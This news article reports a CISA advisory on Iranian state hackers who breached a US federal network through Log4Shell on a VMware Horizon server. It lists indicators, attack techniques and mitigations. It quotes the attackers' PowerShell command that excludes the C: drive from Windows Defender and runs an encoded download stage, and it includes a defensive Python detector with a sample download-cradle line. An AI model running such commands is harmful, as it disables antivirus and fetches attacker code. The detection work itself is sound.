U.S Federal Network Hacked – APT Hackers Gained Access to the Domain Controller

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) uncovered a cyber attack on a U.S. federal network in which attackers compromised the organization's domain controller (DC) and possibly deployed a crypto miner and a credential harvester.

Iranian APT hackers attacked a Federal Civilian Executive Branch (FCEB) organization by exploiting the Log4Shell vulnerability in an unpatched VMware Horizon server.

CVE-2021-44228 (Log4Shell) was a zero-day vulnerability in Log4j, a popular Java logging framework, that allows arbitrary code execution and affects a wide range of products, including VMware Horizon.

CISA believes the attack was carried out by Iranian government-backed hackers who installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence.

In April 2022, CISA conducted a routine investigation and suspected malicious APT activity on the FCEB network with the help of EINSTEIN, an FCEB-wide intrusion detection system (IDS).

APT Activities Investigation

During the investigation, researchers found bi-directional traffic between the network and a known malicious IP address associated with the exploitation of the Log4Shell vulnerability (CVE-2021-44228) in VMware Horizon servers.

CISA observed HTTPS activity from the IP address 51.89.181[.]64 to the organization's VMware server; further in-depth analysis revealed that the IP was associated with a Lightweight Directory Access Protocol (LDAP) server operated by the threat actors to deliver the Log4Shell exploit.

“Following HTTPS activity, CISA observed a suspected LDAP callback on port 443 to this IP address. CISA also observed a DNS query for us-nation-ny[.]cf that resolved back to 51.89.181[.]64 when the victim server was returning this Log4Shell LDAP callback to the actors’ server,” the CISA report said.

Researchers also found an LDAP callback to the IP 51.89.181[.]64 on port 443; upon successful exploitation of the Log4Shell vulnerability, the threat actors went on to compromise the domain controller.

Technical Analysis

The Iranian APT threat actors initially found an unpatched VMware Horizon server deployed by the organization and established a connection from the malicious IP address 182.54.217[.]2 lasting 17.6 seconds.

To evade Windows Defender detection, the attackers added an exclusion rule to Windows Defender using the following PowerShell command:

powershell try{Add-MpPreference -ExclusionPath 'C:\'; Write-Host 'added-exclusion'} catch {Write-Host 'adding-exclusion-failed' }; powershell -enc "$BASE64 encoded payload to download next stage and execute it"

By adding the exclusion rule, the attackers escaped the virus scan and downloaded further tools to the C:\ drive.
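Both halves of the command above, the whole-drive exclusion and the -enc download stage, are visible in PowerShell script-block logging (Event ID 4104). The triage below is an added example, not code from CISA or the article: it runs over constructed script-block texts (the encoded payload is a harmless stand-in built in the block, and 192.0.2.10 is a documentation address), rates exclusions by how broad the excluded path is, and decodes -EncodedCommand arguments to look for a download cradle.

```python
import base64
import re

# Constructed script-block texts shaped like the exclusion and encoded-download
# step on this page. The encoded payload is a harmless stand-in, not the actors'.
def encode_command(ps: str) -> str:
    return base64.b64encode(ps.encode("utf-16le")).decode()  # -enc expects UTF-16LE

SAMPLE_EVENTS = [
    "Get-ChildItem C:\\Users\\Public",
    "try{Add-MpPreference -ExclusionPath 'C:\\'; Write-Host 'added-exclusion'} "
    "catch {Write-Host 'adding-exclusion-failed' }",
    "powershell -enc " + encode_command(
        "Invoke-WebRequest http://192.0.2.10/stage.txt -OutFile C:\\users\\public\\stage.ps1"),
    "Add-MpPreference -ExclusionPath 'C:\\Program Files\\App\\cache'",
]

_EXCL = re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+"
                   r"(?:'([^']*)'|\"([^\"]*)\"|([^\s;]+))", re.I)
_ENC = re.compile(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
_CRADLE = re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|Net\.WebClient", re.I)

def decode_encoded_command(blob: str) -> str:
    """Decode an -EncodedCommand argument (base64 of UTF-16LE) back to script text."""
    return base64.b64decode(blob).decode("utf-16le", errors="replace")

def broad_exclusion(path: str) -> bool:
    """Excluding a whole drive or a whole system directory effectively disables scanning."""
    p = path.rstrip("\\").lower()
    return re.fullmatch(r"[a-z]:", p) is not None or p in ("c:\\users", "c:\\windows", "c:\\programdata")

def analyze_event(text: str) -> list:
    """Return finding strings for one script-block event (empty list if nothing matched)."""
    findings = []
    for m in _EXCL.finditer(text):
        kind, target = m.group(1), m.group(2) or m.group(3) or m.group(4)
        sev = "HIGH" if kind.lower() == "path" and broad_exclusion(target) else "MEDIUM"
        findings.append(f"{sev}: Defender {kind} exclusion added for {target}")
    for m in _ENC.finditer(text):
        decoded = decode_encoded_command(m.group(1))
        label = "HIGH: encoded download cradle: " if _CRADLE.search(decoded) else "LOW: encoded command: "
        findings.append(label + decoded)
    return findings

def triage(events: list) -> dict:
    """Map event index to its findings, keeping only events that produced any."""
    return {i: f for i, t in enumerate(events) if (f := analyze_event(t))}
```

Defender itself also records exclusion changes as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, which gives a second source when script-block logging is not enabled.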

Later, C2 server communication was established, and the exploit payload then downloaded mdeploy.text from 182.54.217[.]2/mdepoy.txt to C:\users\public\mde.ps1.

Soon after file.zip was downloaded from 182.54.217[.]2, mde.ps1 was wiped from the disk to reduce the risk of detection by the AV engine.

When the researchers dug into the file, they found that file.zip carried crypto-mining software and also downloaded around 30 megabytes of files from a transfer[.]sh server, containing the following tools:

  • PsExec – a Microsoft signed tool for system administrators.
  • Mimikatz – a credential theft tool.
  • Ngrok – a reverse proxy tool.

The Mimikatz tool was used against VDI-KMS to harvest credentials and create a rogue domain administrator account, through which the attackers leveraged RDP to gain control over several hosts within the network.

Later they manually disabled Windows Defender through the GUI and eventually implanted Ngrok executables and configuration files.

“The threat actors were able to implant Ngrok on multiple hosts to ensure Ngrok’s persistence should they lose access to a machine during a routine reboot.”

Once the attackers had established a deep foothold in the network, they executed a PowerShell command on Active Directory to gain access to all machines associated with the domain; this lateral movement step was performed after they had gained domain controller access.

Finally, the threat actors changed the local administrator password as a backup in case the rogue domain admin access was detected and terminated.

Threat Actor Tactics and Techniques

Here are the complete TTPs used by the APT hackers in the attack.

  • Initial Access – Exploit Public-Facing Application – actors exploited the Log4Shell bug on the VMware Horizon server.
  • Execution – PowerShell, a Command and Scripting Interpreter – actors executed PowerShell on the AD to obtain a list of machines on the domain.
  • Persistence – Account Manipulation, Create Account: Local Account, Create Account: Domain Account, Scheduled Task/Job: Scheduled Task.
  • Defense Evasion – Impair Defenses: Disable or Modify Tools, Indicator Removal on Host: File Deletion.
  • Credential Access – OS Credential Dumping: LSASS Memory, Credentials from Password Stores.
  • Discovery – Remote System Discovery – PowerShell command on the AD to obtain a list of all machines.
  • Lateral Movement – Remote Services: Remote Desktop Protocol to gain access to multiple hosts on the network.
  • Command and Control – Ngrok to proxy RDP connections and to perform command and control.
  • Ingress Tool Transfer – downloaded malware and multiple tools to the network, including PsExec, Mimikatz, and Ngrok.


CISA and the FBI advised all organizations to immediately apply available patches and follow these mitigations:

  1. Install updated builds to ensure affected VMware Horizon and UAG systems are updated to the latest version.
  2. Keep all software up to date.
  3. Minimize the internet-facing attack surface.
  4. Use best practices for identity and access management (IAM).
  5. Audit domain controllers to log
  6. Create a deny list of known compromised credentials.
  7. Secure credentials by restricting where accounts and credentials can be used.


BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.